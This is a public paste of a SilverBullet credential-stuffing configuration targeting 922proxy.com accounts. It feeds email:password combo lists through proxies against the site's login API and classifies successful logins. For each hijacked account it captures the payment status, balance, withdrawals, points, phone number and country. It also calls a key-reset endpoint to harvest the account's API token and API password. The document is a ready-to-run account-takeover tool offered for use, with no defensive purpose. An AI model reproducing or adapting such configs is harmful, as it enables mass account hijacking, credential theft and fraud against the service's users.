922proxy.com
Public
.SVB
YASHVIRGAMING
Dec 30, 2025
10
.SVB
Copy
Save
Share
QR
New
[SETTINGS] { "Name": "922proxy.com", "SuggestedBots": 50, "MaxCPM": 0, "LastModified": "2025-08-19T19:32:17.5000916+04:00", "AdditionalInfo": "", "RequiredPlugins": [], "Author": "░░░▒▓ 🔥 @therealyashvirgaming 🔥 ▓▒░░░", "Version": "1.1.4 [SB]", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "Default", "DataRules": [], "CustomInputs": [], "CaptchaUrl": "", "IsBase64": false, "FilterList": [], "EvaluateMathOCR": false, "SecurityProtocol": 0, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "AcceptInsecureCertificates": true, "DisableNotifications": false, "DisableImageLoading": false, "DefaultProfileDirectory": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "", "Title": "922proxy", "IconPath": "Icon\\svbfile.ico", "LicenseSource": null, "Message": null, "MessageColor": "#FFFFFFFF", "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]", "AuthorColor": "#FFFFB266", "WordlistColor": "#FFB5C2E1", "BotsColor": "#FFA8FFFF", "CustomInputColor": "#FFD6C7C7", "CPMColor": "#FFFFFFFF", "ProgressColor": "#FFAD93E3", "HitsColor": "#FF66FF66", "CustomColor": "#FFFFB266", "ToCheckColor": "#FF7FFFD4", "FailsColor": "#FFFF3333", "RetriesColor": "#FFFFFF99", "OcrRateColor": "#FF4698FD", "ProxiesColor": "#FFFFFFFF" } [SCRIPT] FUNCTION URLEncode "<USER>" -> VAR "US" FUNCTION URLEncode "<PASS>" -> VAR "PS" #LOGIN REQUEST POST "https://api.922proxy.com/web/user/login_email" CONTENT "response=&email=<US>&password=<PS>&lang=login&fingerprint=QiuyOCjiw0QKTPz9CAwz8vIAVX4IJXY6nah5fnOOEe%2Fyi4qlpOoS7tsyTuq3cFytvQSYv8zPuOI40KDY8fj7eA%3D%3D&time_zone=Indian%2FMauritius&platform=web" CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" HEADER "Host: api.922proxy.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "Accept: application/json, text/javascript, */*; q=0.01" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" HEADER "DNT: 1" HEADER "sec-ch-ua-mobile: ?0" HEADER "Origin: https://www.922proxy.com" HEADER "Sec-Fetch-Site: same-site" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer: https://www.922proxy.com/" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate" HEADER "Content-Length: 242" KEYCHECK KEYCHAIN Failure OR KEY "User password erro" KEY "__T_USER_PASS_WRONG" KEY "\"code\":-1," KEYCHAIN Success OR KEY "{\"code\":0" KEY "msg\":\"Login success" KEY "__T_LOGIN_SUCCESS" #session PARSE "<SOURCE>" LR "\"session\":\"" "\"}," -> VAR "session" #USER REQUEST POST "https://api.922proxy.com/web/user/auto_login" CONTENT "lang=en&session=<session>&check=0" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "Pragma: no-cache" HEADER "Accept: application/json, text/plain, */*" HEADER "Host: api.922proxy.com" HEADER "Connection: keep-alive" HEADER "sec-ch-ua-platform: \"Windows\"" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "DNT: 1" HEADER "sec-ch-ua-mobile: ?0" HEADER "Origin: https://center.922proxy.com" HEADER "Sec-Fetch-Site: same-site" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Dest: empty" HEADER "Referer: https://center.922proxy.com/" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Accept-Encoding: gzip, deflate" HEADER "Content-Length: 56" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Success OR KEY "\"ip_status\":1," KEY "\"is_pay\":1," KEYCHAIN Custom "CUSTOM" OR KEY "\"ip_status\":0," KEY "\"is_pay\":0," #userid PARSE "<SOURCE>" LR "\"user\":{\"id\":" "," -> VAR "userid" #ip_nums PARSE "<SOURCE>" LR "\"ip_num\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "ip_nums" PARSE "<SOURCE>" LR "\"is_pay\":" "," -> VAR "is_pay" #hasPayments FUNCTION Translate KEY "0" VALUE "False" KEY "1" VALUE "True" "<is_pay>" -> CAP "hasPayments" #Level_(rank) PARSE "<SOURCE>" LR "\"level\":" "," CreateEmpty=FALSE -> CAP "Level (rank)" #LISTS REQUEST POST "https://api.922proxy.com/web/account/lists" CONTENT "flow_type=2&category=all&session=<session>&lang=en" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Encoding: gzip, deflate, br, zstd" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cache-Control: no-cache" HEADER "Connection: keep-alive" HEADER "Content-Length: 73" HEADER "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" HEADER "DNT: 1" HEADER "Host: api.922proxy.com" HEADER "Origin: https://center.922proxy.com" HEADER "Pragma: no-cache" HEADER "Referer: https://center.922proxy.com/" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-site" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" #id PARSE "<SOURCE>" LR "\"id\":\"" "\"" -> VAR "id" #Has_Bandwidth PARSE "<SOURCE>" LR "\"bandwidth\":0" "," CreateEmpty=FALSE -> CAP "Has_Bandwidth" #INVITE REQUEST POST "https://api.922proxy.com/web/invite/info" CONTENT "lang=en&session=<session>" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Encoding: gzip, deflate, br, zstd" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cache-Control: no-cache" HEADER "Connection: keep-alive" HEADER "Content-Length: 48" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "DNT: 1" HEADER "Host: api.922proxy.com" HEADER "Origin: https://center.922proxy.com" HEADER "Pragma: no-cache" HEADER "Referer: https://center.922proxy.com/" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-site" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" #Total_Money PARSE "<SOURCE>" LR "\"total_money\":\"" "\"," CreateEmpty=FALSE -> CAP "Total_Money" "$" "" #withdrawal PARSE "<SOURCE>" LR "\"withdrawal\":" "}" -> VAR "withdrawal" #Has_withdrawals FUNCTION Translate KEY "0" VALUE "False" KEY "1" VALUE "True" "<withdrawal>" -> CAP "Has_withdrawals" #SCORE REQUEST POST "https://api.922proxy.com/web/score/info" CONTENT "lang=en&session=<session>" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Encoding: gzip, deflate, br, zstd" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cache-Control: no-cache" HEADER "Connection: keep-alive" HEADER "Content-Length: 48" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "DNT: 1" HEADER "Host: api.922proxy.com" HEADER "Origin: https://center.922proxy.com" HEADER "Pragma: no-cache" HEADER "Referer: https://center.922proxy.com/" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-site" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" #Total_Scores PARSE "<SOURCE>" LR "\"all_score\":" "," CreateEmpty=FALSE -> CAP "Total_Scores" !#Country PARSE "<SOURCE>" LR "\"country\":\"" "\"," CreateEmpty=FALSE -> CAP "Country" #Points_Expiry PARSE "<SOURCE>" LR "\"expire\":\"" "\"," CreateEmpty=FALSE -> CAP "Points_Expiry" #BINDINFO REQUEST POST "https://api.922proxy.com/web/phone/bind_info" CONTENT "session=<session>&lang=en" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Encoding: gzip, deflate, br, zstd" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cache-Control: no-cache" HEADER "Connection: keep-alive" HEADER "Content-Length: 48" HEADER "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" HEADER "DNT: 1" HEADER "Host: api.922proxy.com" HEADER "Origin: https://center.922proxy.com" HEADER "Pragma: no-cache" HEADER "Referer: https://center.922proxy.com/" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-site" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" #phonecode PARSE "<SOURCE>" LR "\"phonecode\":\"" "\"" -> VAR "phonecode" #Phone_Number PARSE "<SOURCE>" LR "\"phone\":\"" "\"" CreateEmpty=FALSE -> CAP "Phone_Number" "<phonecode> " "" #Country PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Country" #RESETKEY REQUEST POST "https://api.922proxy.com/center/docs/reset_key" CONTENT "session=<session>&lang=en" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Encoding: gzip, deflate, br, zstd" HEADER "Accept-Language: en-US,en;q=0.9" HEADER "Cache-Control: no-cache" HEADER "Connection: keep-alive" HEADER "Content-Length: 48" HEADER "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" HEADER "DNT: 1" HEADER "Host: api.922proxy.com" HEADER "Origin: https://center.922proxy.com" HEADER "Pragma: no-cache" HEADER "Referer: https://center.922proxy.com/" HEADER "Sec-Fetch-Dest: empty" HEADER "Sec-Fetch-Mode: cors" HEADER "Sec-Fetch-Site: same-site" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" HEADER "sec-ch-ua-mobile: ?0" HEADER "sec-ch-ua-platform: \"Windows\"" #API_Token PARSE "<SOURCE>" LR "\"token\":\"" "\"" CreateEmpty=FALSE -> CAP "API_Token" #API_Password PARSE "<SOURCE>" LR "\"key\":\"" "\"" CreateEmpty=FALSE -> CAP "API_Password" #AUTHOR FUNCTION Constant "🔥 @therealyashvirgaming 🔥" -> CAP "Config By "
Scan to View
Use your phone's camera or a QR scanner app to open this paste instantly.